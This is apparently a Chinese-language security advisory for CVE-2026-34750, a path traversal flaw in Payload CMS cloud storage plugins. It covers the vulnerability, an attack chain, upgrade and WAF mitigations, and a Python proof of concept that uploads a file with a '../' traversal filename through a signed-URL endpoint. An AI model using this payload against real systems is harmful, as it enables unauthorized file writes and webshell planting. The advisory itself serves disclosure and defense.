CVE-2026-34750 Payload CMS存储插件路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-34750

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Payload CMS (@payloadcms/storage-azure, storage-gcs, storage-r2, storage-s3)

漏洞概述

Payload CMS是一个免费开源的无头内容管理系统。在其Azure、GCS、R2和S3存储插件（版本3.78.0之前）中，存在一个严重的安全漏洞。由于客户端上传的签名URL端点未能正确清洗文件名，攻击者可以通过构造特殊的文件名绕过预期的存储位置限制。该漏洞允许低权限攻击者在未经授权的情况下将文件上传到系统目录之外，可能导致路径遍历攻击，覆盖关键文件或在非预期位置写入恶意数据，从而严重影响系统完整性。官方已在3.78.0版本中修复了此问题，建议用户尽快升级。

技术细节

该漏洞源于Payload CMS的云存储适配器组件在处理文件上传请求时，对文件名参数的输入验证存在逻辑缺陷。具体而言，当应用生成用于客户端直接上传至云存储（如AWS S3、Google Cloud Storage等）的预签名URL时，未对用户提供的文件名进行充分的过滤或规范化处理。攻击者只需拥有低权限账户（PR:L），即可利用此漏洞在文件名字段中注入路径遍历序列（例如 `../` 或绝对路径）。当包含恶意文件名的上传请求通过预签名URL发送到云存储后端时，由于服务端信任了未经过滤的路径参数，文件将被写入存储桶的根目录或其他受保护的父级目录，而非受限的上传目录。这种破坏性的文件写入操作可能导致覆盖配置文件、植入WebShell或破坏应用程序逻辑，造成高完整性影响（I:H）。

攻击链分析

STEP 1

侦察

攻击者识别目标使用Payload CMS，并确认其使用了受影响的云存储插件版本（< 3.78.0）。

STEP 2

获取权限

攻击者注册或获取一个低权限用户账户，因为该漏洞需要低权限认证（PR:L）。

STEP 3

构造载荷

攻击者构造包含路径遍历字符（如 ../）的恶意文件名，意图将文件写入非预期目录。

STEP 4

发起攻击

攻击者通过客户端上传接口，利用获取的预签名URL发送带有恶意文件名的上传请求。

STEP 5

达成影响

由于过滤缺失，文件被云存储服务写入目标系统目录之外的位置，导致完整性受损（I:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# This POC demonstrates the concept of the vulnerability.
# It attempts to upload a file with a path traversal payload.
# Target Payload CMS instance with vulnerable storage plugin.

target_url = "https://example.com/api/upload/generate-upload-url"

# Attacker controlled filename with path traversal
malicious_filename = "../../../../../tmp/malicious_payload.js"

payload_content = "console.log('Vulnerable to CVE-2026-34750');"

# Headers simulating a low-privilege authenticated user
headers = {
    "Authorization": "Bearer <LOW_PRIV_TOKEN>",
    "Content-Type": "application/json"
}

# Step 1: Request the signed URL (hypothetical endpoint)
data = {
    "filename": malicious_filename,
    "mimeType": "application/javascript"
}

try:
    # Response usually contains a 'url' and 'fields' for S3 or similar
    response = requests.post(target_url, json=data, headers=headers)
    
    if response.status_code == 200:
        upload_data = response.json()
        print("[+] Signed URL obtained successfully.")
        
        # Step 2: Upload the file using the signed URL
        # Note: The actual upload mechanism depends on the cloud provider (S3 form POST, PUT, etc.)
        # Here we simulate a PUT request common in S3 uploads
        upload_url = upload_data.get('url')
        
        upload_response = requests.put(upload_url, data=payload_content)
        
        if upload_response.status_code == 200:
            print(f"[+] Exploit successful! File '{malicious_filename}' uploaded outside intended directory.")
        else:
            print(f"[-] Upload failed. Status: {upload_response.status_code}")
    else:
        print(f"[-] Failed to get signed URL. Status: {response.status_code}")
        
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

@payloadcms/storage-azure < 3.78.0

@payloadcms/storage-gcs < 3.78.0

@payloadcms/storage-r2 < 3.78.0

@payloadcms/storage-s3 < 3.78.0

防御指南

临时缓解措施

如果无法立即升级，建议在应用网关或WAF层配置规则，拦截包含路径遍历字符（如“../”、“..\”）的HTTP请求。同时，应严格限制云存储桶的写入权限，确保应用使用的凭证仅能访问特定的前缀目录，并定期审查存储桶内的异常文件。